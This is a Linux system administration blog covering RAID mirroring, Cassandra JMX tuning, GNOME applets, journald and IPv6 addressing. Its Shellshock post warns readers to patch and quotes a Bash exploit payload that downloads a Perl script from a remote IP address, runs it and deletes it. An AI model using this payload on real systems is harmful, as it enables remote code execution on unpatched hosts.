Showing posts with label operating system. Show all posts
Showing posts with label operating system. Show all posts

Saturday, January 31, 2015

How to setup software raid mirroring for disks on xubuntu

Over a course period of time, disk stop working in a computer is to be expected and if it does, then all the data is lost. Oh no, that's not good! In this article, we will take a look on mirroring the data from a disk to another disk using software, and so the data are duplicated on at least two disks. This will reduced the data loss risk by 50%! There is also hardware raid but in this article, we will look into software raid. Specifically software raid one, that is mirroring. For detail explanation of software raid one, please read on this link  but for a shorter explanation, it is basically save the data into two disk at once and read from two disk.

This article assumed you have two disks with same storage capacity and only one partition per disk and this one partition occupied the whole disk size. So the operating system detected both disks as sda and sdb. Let's start to partition them first. Note, create partition will make your current data lost and make sure you backup your data somewhere else safely before continue.
root@localhost:~# fdisk /dev/sdb 

Welcome to fdisk (util-linux 2.25.1).
Changes will remain in memory only, until you decide to write them.
Be careful before using the write command.


Command (m for help): p
Disk /dev/sdb: 465.8 GiB, 500107862016 bytes, 976773168 sectors
Units: sectors of 1 * 512 = 512 bytes
Sector size (logical/physical): 512 bytes / 512 bytes
I/O size (minimum/optimal): 512 bytes / 512 bytes
Disklabel type: dos
Disk identifier: 0x00053dc0

Device Boot Start End Sectors Size Id Type
/dev/sdb1 2048 976773119 976771072 465.8G fd Linux raid autodetect

As you can see above, this is supposed to be the end result it should be. You can type m for help. To create a partition, this is your homework, but as a hints, you need add a new partition, with only 1 partition and used all all the cylinder. Then you need to change the disk partition type to Linux raid auto and remember to save the change you made so fdisk will write the partition and partition type to the disk.

Repeat this procedure for another disk, sdc. The partition information of sdc should be identical to sdb above. Note, you can use fdisk -l /dev/sdb and fdisk -l /dev/sdc to verify the disk is changed accordingly.
root@localhost:~# fdisk /dev/sdc

Welcome to fdisk (util-linux 2.25.1).
Changes will remain in memory only, until you decide to write them.
Be careful before using the write command.


Command (m for help): p
Disk /dev/sdc: 465.8 GiB, 500107862016 bytes, 976773168 sectors
Units: sectors of 1 * 512 = 512 bytes
Sector size (logical/physical): 512 bytes / 4096 bytes
I/O size (minimum/optimal): 4096 bytes / 4096 bytes
Disklabel type: dos
Disk identifier: 0x00019748

Device Boot Start End Sectors Size Id Type
/dev/sdc1 2048 976773119 976771072 465.8G fd Linux raid autodetect

If you do not have mdadm install, you should install it now. To install mdadm, it is as easy as apt-get install mdadm. mdadm is a Linux utility used to manage software RAID devices.

After mdadm is installed, then it is time to add that two partition into mdadm. To do that, issue the following command.
# mdadm --create /dev/md0 --level=mirror --raid-devices=2 /dev/sdb1 /dev/sdc1

The above commend should return immediately and now you can format the new block device using the command.
# mkfs.ext4 /dev/md0

By now, the disk will be formatted to ext4 filesystem and you can check the progress using command cat /proc/mdstat. You can also check the raid detail using this command mdadm --detail /dev/md0 .
root@localhost:~# mdadm --detail /dev/md0
/dev/md0:
Version : 1.2
Creation Time : Fri Dec 12 03:54:49 2014
Raid Level : raid1
Array Size : 488254464 (465.64 GiB 499.97 GB)
Used Dev Size : 488254464 (465.64 GiB 499.97 GB)
Raid Devices : 2
Total Devices : 2
Persistence : Superblock is persistent

Intent Bitmap : Internal

Update Time : Thu Jan 8 21:42:16 2015
State : active
Active Devices : 2
Working Devices : 2
Failed Devices : 0
Spare Devices : 0

Name :
UUID : be4c04c4:349da5d9:cbcd7313:7ec7cf60
Events : 26492

Number Major Minor RaidDevice State
0 8 17 0 active sync /dev/sdb1
1 8 33 1 active sync /dev/sdc1

When the disk is done formatted, you should be able to see output like the following.
root@localhost:~# cat /proc/mdstat 
Personalities : [raid1] [linear] [multipath] [raid0] [raid6] [raid5] [raid4] [raid10]
md0 : active raid1 sdc1[1] sdb1[0]
488254464 blocks super 1.2 [2/2] [UU]
bitmap: 4/4 pages [16KB], 65536KB chunk

unused devices: <none>

Note the UU, if the raid is degraded, like a disk failure, you should be able to see [_U] or [U_] depending on which disk is failing.

The last step is to mount this new device to a mount point so that we can start to use. The example below create a mount point on /mnt/myBackup and mount md0 to /mnt/myBackup
root@localhost:~# mkdir /mnt/myBackup
root@localhost:~# mount /dev/md0 /mnt/myBackup

To make this change survive over a reboot, you should add an entry into /etc/fstab.
/dev/md0 /mnt/myBackup ext4 defaults 1 2

You should also save the raid configuration into mdadm configuration file. The following command does just that.
root@localhost:~# mdadm --detail --scan > /etc/mdadm/mdadm.conf

That's it, I hope your data are save from now on.

Friday, January 16, 2015

operate casandra using jmx in terminal including changing pool size, compacting sstables and key cache

If you operate apache cassandra cluster and if load per node goes huge (like nodetool info show 800GB), compactions become a problem. It's a big problem for apache cassandra 1.0.8 if you have load per node average hover around 600GB to 1TB. The read performance suffers and at times system uptime load goes high. In some instance, I noticed when repair is running, system load goes more than 20. It's not a concern if this is operating well, but the more often you see this, something has gone wrong. Today, I will share my experience on how to operate cassandra when node load is huge and cassandra instance is still running. Often times, there are nice method that is exposed via jmx but to operate remotely, jmx gui client such as jmxconsole is not ideal. Instead, we will using a jmxterm for these operation in apache cassandra 1.0.8. So let's get started.

Changing pool size

So, it is pretty simple, launch it and set to the bean, and then set the CorePoolSize. The steps will be illustrate below.
$ java -jar jmxterm-1.0-alpha-4-uber.jar
$>open localhost:7199
#Connection to localhost:7199 is opened
$>bean org.apache.cassandra.request:type=ReplicateOnWriteStage
#bean is set to org.apache.cassandra.request:type=ReplicateOnWriteStage
$>get CorePoolSize
#mbean = org.apache.cassandra.request:type=ReplicateOnWriteStage:
CorePoolSize = 32;
$>info
#mbean = org.apache.cassandra.request:type=ReplicateOnWriteStage
#class name = org.apache.cassandra.concurrent.JMXConfigurableThreadPoolExecutor
# attributes
%0 - ActiveCount (int, r)
%1 - CompletedTasks (long, r)
%2 - CorePoolSize (int, rw)
%3 - CurrentlyBlockedTasks (int, r)
%4 - PendingTasks (long, r)
%5 - TotalBlockedTasks (int, r)
#there's no operations
#there's no notifications
$>set CorePoolSize 64
$>get CorePoolSize
#mbean = org.apache.cassandra.request:type=ReplicateOnWriteStage:
CorePoolSize = 64;

Alter key cache

Often times, when there is heap pressure in the jvm, the safety valve kicks in.  You can restart the cassandra instance or you can reset the key cache back to the initial value. Assuming your column family name FooBar and keyspace just4fun, then the following are steps to illustrate how is this done.
$>bean org.apache.cassandra.db:cache=FooBarKeyCache,keyspace=just4fun,type=Caches
#bean is set to org.apache.cassandra.db:cache=FooBarKeyCache,keyspace=just4fun,type=Caches
$>info
#mbean = org.apache.cassandra.db:cache=FooBarKeyCache,keyspace=just4fun,type=Caches
#class name = org.apache.cassandra.cache.AutoSavingKeyCache
# attributes
%0 - Capacity (int, rw)
%1 - Hits (long, r)
%2 - RecentHitRate (double, r)
%3 - Requests (long, r)
%4 - Size (int, r)
#there's no operations
#there's no notifications
$>
$>get Size
#mbean = org.apache.cassandra.db:cache=FooBarKeyCache,keyspace=just4fun,type=Caches:
Size = 122307;

$>set Capacity 250000
#Value of attribute Capacity is set to 250000
$>get Capacity;
#mbean = org.apache.cassandra.db:cache=FooBarKeyCache,keyspace=just4fun,type=Caches:
$>get Capacity
#mbean = org.apache.cassandra.db:cache=FooBarKeyCache,keyspace=just4fun,type=Caches:
Capacity = 250000;

Compact sstable

Lastly, to compact sstables. It's amazing we have a sstable that as huge as 84GB! So trigger major compaction is not an option here, often time when load per node goes beyond 600GB, compaction took forever, as GC kick in and cpu keep on recollecting heap, making system load goes high. So here, we will select one sstable that is huge and compact that only. You can also select a few sstable and compact them and separate using comma.
$>bean org.apache.cassandra.db:type=CompactionManager
#bean is set to org.apache.cassandra.db:type=CompactionManager
$>run forceUserDefinedCompaction just4fun FooBar-hc-5-Index.db
#calling operation forceUserDefinedCompaction of mbean org.apache.cassandra.db:type=CompactionManager
#RuntimeMBeanException: java.lang.IllegalArgumentException: FooBar-hc-5-Index.db does not appear to be a data file
$>run forceUserDefinedCompaction just4fun FooBar-hc-401-Data.db
#calling operation forceUserDefinedCompaction of mbean org.apache.cassandra.db:type=CompactionManager
#operation returns:
null

The compaction should be started, you can check in cassandra system log or the nodetool compaction. So that's it, I hope you learned something.

Sunday, January 4, 2015

Embed video into debian mediawiki

Today, this article is a bit special and a short one, we will configured
something interesting. We will embed video into mediawiki in debian. It's
actually a request from friend and so we will take a look at how to do it.
Let's see the screenshot below and if you want to do something like this, then
read on.

mediawiki_Extension_EmbedVideo

 

Before we get started, you will require root access in debian and already install
and configured mediawiki already.

1. change directory to
# cd /usr/share/mediawiki-extensions

2. pull from mediawiki embedvideo source from github.
# git pull https://github.com/Alexia/mediawiki-embedvideo.git

3. enable this extension.
# cd /etc/mediawiki-extensions/extensions-available
# ln -s /usr/share/mediawiki-extensions/mediawiki-embedvideo/EmbedVideo.php
# cd ../extensions-enabled
# ln -s ../extensions-available/EmbedVideo.php

Easy! Three easy steps. Now, let's edit a wiki page and an example below.
[https://www.youtube.com/watch?v=xmmYEtS13BQ Al Gromer Khan & Klaus Wiese - The Alchemy of Happiness]
{{#ev:youtube|xmmYEtS13BQ}}

[https://www.youtube.com/watch?v=ls7NMH_O5Ck&list=RDVpxBTgbeMsw&index=10 RELAXING MUSIC Relax Mind Body, Sleep Music, Meditation music, Relaxation Music Stress Relief]
{{#ev:youtube|ls7NMH_O5Ck}}

Save the page and that's it!

Sunday, December 21, 2014

apache cassandra 1.0.8 out of memory error unable to create new native thread

If you are using apache cassandra 1.0.8 and having the exception such as below, you may want to further read. Today, we will investigate on what this error means and what can we do to correct this situation.
ERROR [Thread-273] 2012-14-10 16:33:18,328 AbstractCassandraDaemon.java (line 139) Fatal exception in thread Thread[Thread-273,5,main]
java.lang.OutOfMemoryError: unable to create new native thread
at java.lang.Thread.start0(Native Method)
at java.lang.Thread.start(Thread.java:640)
at java.util.concurrent.ThreadPoolExecutor.addIfUnderMaximumPoolSize(ThreadPoolExecutor.java:727)
at java.util.concurrent.ThreadPoolExecutor.execute(ThreadPoolExecutor.java:657)
at org.apache.cassandra.thrift.CustomTThreadPoolServer.serve(CustomTThreadPoolServer.java:104)
at org.apache.cassandra.thrift.CassandraDaemon$ThriftServer.run(CassandraDaemon.java:214)

This is not good, the application crashed with this error during operation. To illustrate this environment, it is running using oracle java 6 with apache cassandra 1.0.8. It has 12GB of java heap assigned with stack size 128k, max user processes 260000 and open files capped at 65536.

Investigate into the java stack trace, reveal that, this error is not thrown by java code but native code. Below is the trace path.

  1. https://github.com/apache/cassandra/blob/cassandra-0.8/src/java/org/apache/cassandra/thrift/CassandraDaemon.java#L214

  2. https://github.com/apache/cassandra/blob/cassandra-1.0.8/src/java/org/apache/cassandra/thrift/CustomTThreadPoolServer.java#L104

  3. ThreadPoolExecutor.java line 657
    cassandra_investigation_1

  4. ThreadPoolExecutor.java line 727
    cassandra_investigation_2

  5. Thread.java line 640
    cassandra_investigation_3


A little explanation before we delve even deeper. Number 3 to 5, is jdk dependent. Hence, if you are using openjdk, the line number may be different. As mentioned early, I'm using oracle jdk. Unfortunately, it is not available online for browsing but you can download the source from oracle site.

Because this is a native call, we will look into code that is not in Java. If the following code looks alien to you, it sure looks alien to me as it is probably written in c++. If you have also notice, this code is taken from openjdk and it is not found in the oracle jdk. Probably it is a closed source but we will not go there. Let's just focus where this error thrown from and why. It is taken from here and the explanation here.
JVM_ENTRY(void, JVM_StartThread(JNIEnv* env, jobject jthread))
JVMWrapper("JVM_StartThread");
JavaThread *native_thread = NULL;

// We cannot hold the Threads_lock when we throw an exception,
// due to rank ordering issues. Example: we might need to grab the
// Heap_lock while we construct the exception.
bool throw_illegal_thread_state = false;

// We must release the Threads_lock before we can post a jvmti event
// in Thread::start.
{
// Ensure that the C++ Thread and OSThread structures aren't freed before
// we operate.
MutexLocker mu(Threads_lock);

// Since JDK 5 the java.lang.Thread threadStatus is used to prevent
// re-starting an already started thread, so we should usually find
// that the JavaThread is null. However for a JNI attached thread
// there is a small window between the Thread object being created
// (with its JavaThread set) and the update to its threadStatus, so we
// have to check for this
if (java_lang_Thread::thread(JNIHandles::resolve_non_null(jthread)) != NULL) {
throw_illegal_thread_state = true;
} else {
// We could also check the stillborn flag to see if this thread was already stopped, but
// for historical reasons we let the thread detect that itself when it starts running

jlong size =
java_lang_Thread::stackSize(JNIHandles::resolve_non_null(jthread));
// Allocate the C++ Thread structure and create the native thread. The
// stack size retrieved from java is signed, but the constructor takes
// size_t (an unsigned type), so avoid passing negative values which would
// result in really large stacks.
size_t sz = size > 0 ? (size_t) size : 0;
native_thread = new JavaThread(&thread_entry, sz);

// At this point it may be possible that no osthread was created for the
// JavaThread due to lack of memory. Check for this situation and throw
// an exception if necessary. Eventually we may want to change this so
// that we only grab the lock if the thread was created successfully -
// then we can also do this check and throw the exception in the
// JavaThread constructor.
if (native_thread->osthread() != NULL) {
// Note: the current thread is not being used within "prepare".
native_thread->prepare(jthread);
}
}
}

if (throw_illegal_thread_state) {
THROW(vmSymbols::java_lang_IllegalThreadStateException());
}

assert(native_thread != NULL, "Starting null thread?");

if (native_thread->osthread() == NULL) {
// No one should hold a reference to the 'native_thread'.
delete native_thread;
if (JvmtiExport::should_post_resource_exhausted()) {
JvmtiExport::post_resource_exhausted(
JVMTI_RESOURCE_EXHAUSTED_OOM_ERROR | JVMTI_RESOURCE_EXHAUSTED_THREADS,
"unable to create new native thread");
}
THROW_MSG(vmSymbols::java_lang_OutOfMemoryError(),
"unable to create new native thread");
}

Thread::start(native_thread);

JVM_END

As I don't have knowledge in cpp, hence, there is no analysis into this snippet above, but if you understand what it does, I will be happy if you can give your analysis as a comment below of this article. It certainly looks to me that the operating system cannot create a thread at this point due to a few errors, JVMTI_RESOURCE_EXHAUSTED_OOM_ERROR and / or JVMTI_RESOURCE_EXHAUSTED_THREADS. Let's google to find out what is that supposed to mean. Below are some which is interesting.

To summarize the analysis from the links above.

  • stack is created when thread is created and when more threads are created, hence the total of stacks also increased as a result.

  • A Java Virtual Machine stack stores frames. A Java Virtual Machine stack is analogous to the stack of a conventional language such as C: it holds local variables and partial results, and plays a part in method invocation and return.

  • Java stack is not within of java heap, hence, even if you increase java heap to the cassandra via parameter -Xms or -Xmx, this error will happen again if the condition is met again in the future.

  • If Java Virtual Machine stacks can be dynamically expanded, and expansion is attempted but insufficient memory can be made available to effect the expansion, or if insufficient memory can be made available to create the initial Java Virtual Machine stack for a new thread, the Java Virtual Machine throws an OutOfMemoryError.


Until current analysis, it certainly looks to me that when cassandra instance trying to create a new thread, it was not able to. It was not able to because the underlying operating system cannot create the thread due to two errors. It actually looks like the operating system does not have sufficient memory to create the thread, hence increasing -Xms or -Xmx will not solve the problem. Note that the file descriptor set in this case is not met neither as most of the criterias pretty much infinite.

It's pretty interesting to note that, if such error is thrown, to solve the problem is to decrease the -Xss or even the heap -Xms and -Xmx. Although I don't understand the logic behind of such method used, perhaps you should try but I seriously doubt so. If cassandra node has high usage of heap, decreasing heap will only create another type of problem.

If you know or have encountered such problem before and has a good fix, please leave the comment below this article. To end this article, there is currently as of this writing, a discussion happen at cassandra mailing list.

Sunday, December 7, 2014

Gnome goodies: add hardware sensor in panel. add stock indicator in the panel.

Today we will add two more applets to the gnome panel. You might want to look into the past article about gnome applets that were configured before. Okay, let's start by installing an applet that will show hardware temperature.

There is a nice package, psensor and it can be install as easy as
$ sudo apt-get install psensor
$ psensor

So just launch the application from the terminal, then see the screenshot below.

psensor

On the left, I have configured three temperature to be plotted. Because hardware in different computer are different, so you can enable plotting for different hardware. On the right, it is the psensor preferences, and I have enabled checkbox for Launch on session startup and Hide window on startup.

Next, we will install a stock applet as a favor for a friend. Because in debian, this is not available and now we will download from ubuntu repository. Point your browser to https://launchpad.net/~ce3a/+archive/ubuntu/indicator-stocks/+packages and download latest version of indicator-stocks. As of this writing, I'm installing indicator-stocks_0.2.4-0ubuntu1_amd64
user@localhost:~/Desktop$ sudo dpkg -i indicator-stocks_0.2.4-0ubuntu1_amd64.deb 
Selecting previously unselected package indicator-stocks.
(Reading database ... 321688 files and directories currently installed.)
Preparing to unpack indicator-stocks_0.2.4-0ubuntu1_amd64.deb ...
Unpacking indicator-stocks (0.2.4-0ubuntu1) ...
dpkg: dependency problems prevent configuration of indicator-stocks:
indicator-stocks depends on libappindicator0.1-cil; however:
Package libappindicator0.1-cil is not installed.

dpkg: error processing package indicator-stocks (--install):
dependency problems - leaving unconfigured
Processing triggers for gnome-menus (3.13.3-2) ...
Processing triggers for mime-support (3.57) ...
Processing triggers for desktop-file-utils (0.22-1) ...
Processing triggers for hicolor-icon-theme (0.13-1) ...
Errors were encountered while processing:
indicator-stocks

As you can read above, there is a dependency problem during installing indicator-stocks. So just use apt-get install for the remaining package. It should be simple process to resolved that using apt. So it is finally installed, check the screenshot below. You can configured a few symbols, it is from finance.yahoo.com.

indicator-stocks

That's it, from the past and in this articles, I hope your desktop should present as much information as possible.

Friday, November 21, 2014

Gnome goodies: How to sort directory and then file. How to enable weather in the gnome panel

Today we will take a look at two gnome3 applets. I used to have these settings back in gnome and gnome2 and I think this is a very nice goody that should remain in gnome3.

How to sort directory and then file

In gnome3, file and folders are mixed, that's if the folder is sort by modification dates. See example screenshot below.

folders_files_mixed

Well, for personal preference would be, folders are group first and then with normal files. See example screenshot below.

folders_then_files

In order to achieve this behaviour, gnome configuration need to be alter. Launch dconf-editor in the command line and navigate in such a fashion. Go to org -> gnome -> nautilus -> preferences . Then check sort-directories-first. See screenshot below. Easy :)

dconf_editor-sort-directories-first

 

How to enable weather in the gnome panel

During gnome2, it is as easy as adding a location and in the drop down of the date/time applet. See screenshot below.

timezone_world_map

However, thing get changed in gnome3. Date/time applet no longer showing weather information. There is an alternative, gnome-shell-extension-weather package add weather information to the gnome panel. See screenshot below.

gnome-shell-extension-openweather

To install this extension, it is as easy as apt-get install gnome-shell-extension-weather

To enable gnome-shell-extension-weather in the gnome panel, you need to enable it. To enable, launch gnome-shell-extension-prefs from the command line and then search for OpenWeather and flip the switch to on position. See screenshot below.

gnome-shell-extension-prefs

Now the weather information should shown in the gnome panel! Start adding more places of interest in the applet! :)

To end this article, try to add places of interest in the weather applet :) I will leave this as an exercise for you.

Sunday, November 9, 2014

gnome-clocks alternative to gnome2 world timezone map

During gnome2 time, I like the world map where it show the earth timezone information. Take a look at the below screenshot. It shown the part of earth on day and part of earth on night. Then you can see the countries weather information like temperature, wind speed, sunrise and sunset.

timezone_world_map

In gnome3, however, all these information are lost. I don't know why upgrade to gnome3, it became a detrimental step. A lot of useful information applets get lost. Not only a lot of useful applets got lost, the window animation constantly keep the cpu busy and application response sometime get slow. Something to ponder if I should choose different window manager.

Anyway, in the meantime, let's take a look at alternative to gnome2 world timezone country information. I google and found out gnome-clocks.

Simple GNOME app with stopwatch, timer, and world clock support GNOME Clocks is a simple application to show the time and date in multiple locations and set alarms or timers. A stopwatch is also included.
user@localhost:~$ sudo apt-get install gnome-clocks
Reading package lists... Done
Building dependency tree
Reading state information... Done
The following package was automatically installed and is no longer required:
linux-image-amd64
Use 'apt-get autoremove' to remove it.
The following NEW packages will be installed:
gnome-clocks
0 upgraded, 1 newly installed, 0 to remove and 691 not upgraded.
Need to get 326 kB of archives.
After this operation, 1,193 kB of additional disk space will be used.
Get:1 http://cdn.debian.net/debian/ unstable/main gnome-clocks amd64 3.14.0-1 [326 kB]
Fetched 326 kB in 4s (66.8 kB/s)
Selecting previously unselected package gnome-clocks.
(Reading database ... 320953 files and directories currently installed.)
Preparing to unpack .../gnome-clocks_3.14.0-1_amd64.deb ...
Unpacking gnome-clocks (3.14.0-1) ...
Processing triggers for libglib2.0-0:i386 (2.42.0-2) ...
Processing triggers for libglib2.0-0:amd64 (2.42.0-2) ...
Processing triggers for hicolor-icon-theme (0.13-1) ...
Processing triggers for gnome-menus (3.13.3-2) ...
Processing triggers for mime-support (3.57) ...
Processing triggers for desktop-file-utils (0.22-1) ...
Setting up gnome-clocks (3.14.0-1) ...

So all goods, let's launch it. You can either launch gnome-clocks using command line or you can launch it from date/time panel. See screenshot below and click on Open Clocks.

gnome-clock

As seen below, I have configure a few countries. How to add time for a country is left as an exercise for you and I promise it will not that difficult ;). Unfortunately it does not show information other that just clock. It was a pity anyway. Anyway, better than none until sometime generous enough to develop additional information like weather and graphical earth day and night.

gnome-clock-main-window

That's it people, I hope you get some nice replacement when you transition into gnome3 environment.

Saturday, November 8, 2014

Set date in gnome3 gnome-shell panel

If you came from gnome2 or before, you can easily alter configuration date and time in the panel. I don't know why the changes in gnome3 make everything so painfully to configure. It supposed to be easy and intuitive and can be achieve in few seconds but this is not the case anymore. Today, we will change the default configuration to something we used to. See screenshot below.

dconf_editor_datetime_config_before

Introducing dconf-editor.

The dconf-editor program provides a graphical interface for editing settings that are stored in the dconf database. The gsettings(1) utility provides similar functionality on the commandline.

So install this package if it is not available. Let's launch the app.
user@localhost:~$ dconf-editor

dconf-editor window popup. On the left tree menu, expand in this succession. org -> gnome -> desktop -> interface . Check the button for the field you would like to enable. In the screenshot below, I have enable my use to desktop setting, show the date and show seconds.

dconf_editor_datetime_config_after

That's it, in the next article, we will probably look into the earth daylight map on the date / time calendar. I like that feature too but somehow it is not available in gnome3.

Saturday, October 25, 2014

Why is CVE-2014-7169 is important and you should patch your system

Recently I have come across this link and read about it. Before we go into the details. Let's understand what is it.

From Red Hat errata https://rhn.redhat.com/errata/RHSA-2014-1306.html

It was found that the fix for CVE-2014-6271 was incomplete, and Bash still
allowed certain characters to be injected into other environments via
specially crafted environment variables. An attacker could potentially use
this flaw to override or bypass environment restrictions to execute shell
commands. Certain services and applications allow remote unauthenticated
attackers to provide environment variables, allowing them to exploit this
issue. (CVE-2014-7169)

So let's check my system. Hmm.. my local host is affected :-)
jason@localhost:~$ env x='() { :;}; echo vulnerable'  bash -c "echo this is a test"
vulnerable
this is a test
jason@localhost:~$ whoami
jason

But what is this important? the user still using his own privileged. It turn out to be this exploit allow remote attacker to execute the script remotely. Let's change the script a bit.
() { :;}; /bin/bash -c "cd /tmp;wget http://213.5.67.223/jur;curl -O http://213.5.67.223/jur ; perl /tmp/jur;rm -rf /tmp/jur"

See the point? Does it look scarry? A remote script is downloaded to your system, and execute it. So any local services that use shell for interpretation basically is vulnerable and you should patch bash as soon as possible. As of this moment of writing, the patch is out. In CentOS 7, the patched is included in the package bash-4.2.45-5.el7_0.4.x86_64. Read the changelog below.
* Thu Sep 25 2014 Ondrej Oprala <ooprala@redhat.com> - 4.2.45-5.4
- CVE-2014-7169
Resolves: #1146324

Below are some service which uses bash and if your system use some of it, you should know what to do.

  • ForceCommand is used in sshd configs to provide limited command execution capabilities for remote users. This flaw can be used to bypass that and provide arbitrary command execution. Some Git and Subversion deployments use such restricted shells. Regular use of OpenSSH is not affected because users already have shell access.

  • Apache server using mod_cgi or mod_cgid are affected if CGI scripts are either written in Bash, or spawn subshells. Such subshells are implicitly used by system/popen in C, by os.system/os.popen in Python, system/exec in PHP (when run in CGI mode), and open/system in Perl if a shell is used (which depends on the command string).

  • PHP scripts executed with mod_php are not affected even if they spawn subshells.

  • DHCP clients invoke shell scripts to configure the system, with values taken from a potentially malicious server. This would allow arbitrary commands to be run, typically as root, on the DHCP client machine.

  • Various daemons and SUID/privileged programs may execute shell scripts with environment variable values set / influenced by the user, which would allow for arbitrary commands to be run.

  • Any other application which is hooked onto a shell or runs a shell script as using Bash as the interpreter. Shell scripts which do not export variables are not vulnerable to this issue, even if they process untrusted content and store it in (unexported) shell variables and open subshells.


Thanks, that's it for this article. Be good and stay safe.

Sunday, October 12, 2014

Enable FSS in journald and verify using journalctl

Last we learned the basic of journalctl, today we will enable FSS in journald.

Forward Secure Sealing or FSS allows application to cryptographically "seal" the system logs in regular time intervals, so that if your machine is hacked the attacker cannot alter log history (but can still entirely delete it). It works by generating a key pair of "sealing key" and "verification key".

read more at https://eprint.iacr.org/2013/397

Okay, let's set it up. With this, we will use CentOS 7 for learning.

As root, let's setup the keys.
[root@centos7-test1 ~]# journalctl --setup-keys
/var/log/journal is not a directory, must be using persistent logging for FSS.

Hmm.. not possible because /run is mounted on tmpfs. We will now enable persistent storage for journald.

  1. as root, create directory # mkdir -p /var/log/journal 

  2. edit /etc/systemd/journald.conf and uncomment the following.

    1. Storage=persistence

    2. Seal=yes



  3. restart journald using command systemctl restart systemd-journald 

  4. Rerun command journalctl --setup-keys. See screenshot below.
    journald-fss

  5. Now we verify the log using command
    [root@centos7-test1 ~]# journalctl --verify
    PASS: /var/log/journal/e25a4e0b618f43879af033a74902d0af/system.journal



Looks good. Although I am not sure what is the verify-key as different verify key is used, it is always passed. Probably it will be fail if the logging is tampered.

Friday, October 10, 2014

Derive IPv6 link-local address for network interface

When you show the interface configuration using command ip, you will noticed there is a inet6 address start with fe80. Today, we will learn what is this and how this address is derive. Example below
user@localhost:~$ ip addr show wlan0
3: wlan0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc mq state UP qlen 1000
link/ether 4c:33:22:11:aa:ee brd ff:ff:ff:ff:ff:ff
inet 192.168.133.50/24 brd 192.168.133.255 scope global wlan0
valid_lft forever preferred_lft forever
inet6 2001:e68:5424:d2dd:4e33:22ff:fe11:aaee/64 scope global dynamic
valid_lft 86399sec preferred_lft 14399sec
inet6 fe80::4e33:22ff:fe11:aaee/64 scope link
valid_lft forever preferred_lft forever

So first, what is Link-local address?

In a computer network, a link-local address is a network address that is valid only for communications within the network segment (link) or the broadcast domain that the host is connected to.

Link-local addresses are usually not guaranteed to be unique beyond a single network segment. Routers therefore do not forward packets with link-local addresses.

For protocols that have only link-local addresses, such as Ethernet, hardware addresses that the manufacturer delivers in network circuits are unique, consisting of a vendor identification and a serial identifier.

Link-local addresses for IPv4 are defined in the address block 169.254.0.0/16, in CIDR notation. In IPv6, they are assigned with the fe80::/10 prefix.

So it is a wire address that is locally within a segment of a network and it is not routable beyond a router.

With this said, let's calculate link-local address.

1. take the mac address from ip command.
from above example 4c:33:22:11:aa:ee

2. add ff:fe in the middle of the current mac address.
4c:33:22:ff:fe:11:aa:ee

3. reformat to IPv6 notation by concatenate two hex groups into one.
4c33:22ff:fe11:aaee

4. convert the first octet from hexadecimal to binary
4c -> 01001100

5. invert the bit at position 6, starting from left with first bit as 0.
01001100 -> 01001110

6. convert the octet back in step 5 back to hexadecimal
01001110 -> 4e

7. replace first octet with newly calculated from step 6.
4e33:22ff:fe11:aaee

8. prepend the link-local prefix
fe80::4e33:22ff:fe11:aaee

That's it.

Saturday, September 27, 2014

Study journalctl in CentOS 7

In CentOS 7, the new systemd has a new journaling app, known as journalctl. Today, we will study journalctl. First, what is journalctl?

journalctl is a client app to query the systemd journal. Systemd journal is written by systemd-journald.service.

Let's sudo into root and we will study journalctl via examples.
[user@localhost ~]$ sudo su -
Last login: Sat Sep 13 11:57:55 CEST 2014 on pts/0
[user@localhost ~]# journalctl
-- Logs begin at Mon 2014-09-01 14:57:19 CEST, end at Mon 2014-09-15 10:52:52 CEST. --
Sep 01 14:57:19 localhost systemd-journal[146]: Runtime journal is using 8.0M (max 2.3G, leaving 3.5G of free 23.4G, current limit 2.3G).
Sep 01 14:57:19 localhost systemd-journal[146]: Runtime journal is using 8.0M (max 2.3G, leaving 3.5G of free 23.4G, current limit 2.3G).
Sep 01 14:57:19 localhost kernel: Initializing cgroup subsys cpuset
Sep 01 14:57:19 localhost kernel: Initializing cgroup subsys cpu
Sep 01 14:57:19 localhost kernel: Initializing cgroup subsys cpuacct
Sep 01 14:57:19 localhost kernel: Linux version 3.10.0-123.6.3.el7.x86_64 (builder@kbuilder.dev.centos.org) (gcc version 4.8.2 20140120 (Red Hat 4.8.2-16) (GC
Sep 01 14:57:19 localhost kernel: Command line: BOOT_IMAGE=/vmlinuz-3.10.0-123.6.3.el7.x86_64 root=UUID=bbbbbbbb-7777-465a-993a-888888888888 ro nomodeset rd.a
Sep 01 14:57:19 localhost kernel: e820: BIOS-provided physical RAM map:
...
...
...
Sep 15 10:57:00 foo.example.com sshd[23533]: Received disconnect from 123.123.123.123: 11: disconnected by user
Sep 15 10:57:00 foo.example.com systemd-logind[1161]: Removed session 9773.
Sep 15 10:59:04 foo.example.com sshd[23813]: Accepted publickey for foobar from 132.132.132.132 port 36843 ssh2: RSA 68:68:68:68:68:86:68:68:68:68:68:68:0
Sep 15 10:59:04 foo.example.com systemd[1]: Created slice user-1005.slice.
Sep 15 10:59:04 foo.example.com systemd[1]: Starting Session 9774 of user foobar.
Sep 15 10:59:04 foo.example.com systemd-logind[1161]: New session 9774 of user foobar.
Sep 15 10:59:04 foo.example.com systemd[1]: Started Session 9774 of user foobar.
Sep 15 10:59:04 foo.example.com sshd[23813]: pam_unix(sshd:session): session opened for user foobar by (uid=0)
lines 53881-53917/53917 (END)

As you may noticed, journalctl show all the logging since the system was booted until at this moment. So there are a lot of lines and data to be interpreted. So you might want to look into the parameters accepted for this application.

If you want to show most recent log, give -r. This will reverse the ordering by showing newest entries first. If you want to show newest ten lines, give -n as a parameter. Example journalctl -r -n 10

To show how much all these log take the disk space, give --disk-usage. Note that journal logs are stored in the directory /run/log/journal and not /var/log.

If you want to show only log from a unit(service), give --unit. Example journalctl --unit=sshd will show logging for sshd only. Very neat!

Sometime you just want to monitor a certain range of date and/or time. You can append parameter --since and --until. Example journalctl --since="2014-09-14 01:00:00" --until="2014-09-14 02:00:00" it will show all journal within that duration of 1hour. I think this is really good for system monitoring, system support or even during finding trace of compromised system.

If you want the journal logs to appear in web interface, you can format the logging to a format the web application supported. As of this time of writing, journalctl supported the following format.











































shortis the default and generates an output that is mostly identical to the formatting of classic syslog files, showing one line per journal entry.
short-isois very similar, but shows ISO 8601 wallclock timestamps.
short-preciseis very similar, but shows timestamps with full microsecond precision.
short-monotonicis very similar, but shows monotonic timestamps instead of wallclock timestamps.
verboseshows the full-structured entry items with all fields.
exportserializes the journal into a binary (but mostly text-based) stream suitable for backups and network transfer (see Journal Export Format[1] for more information).
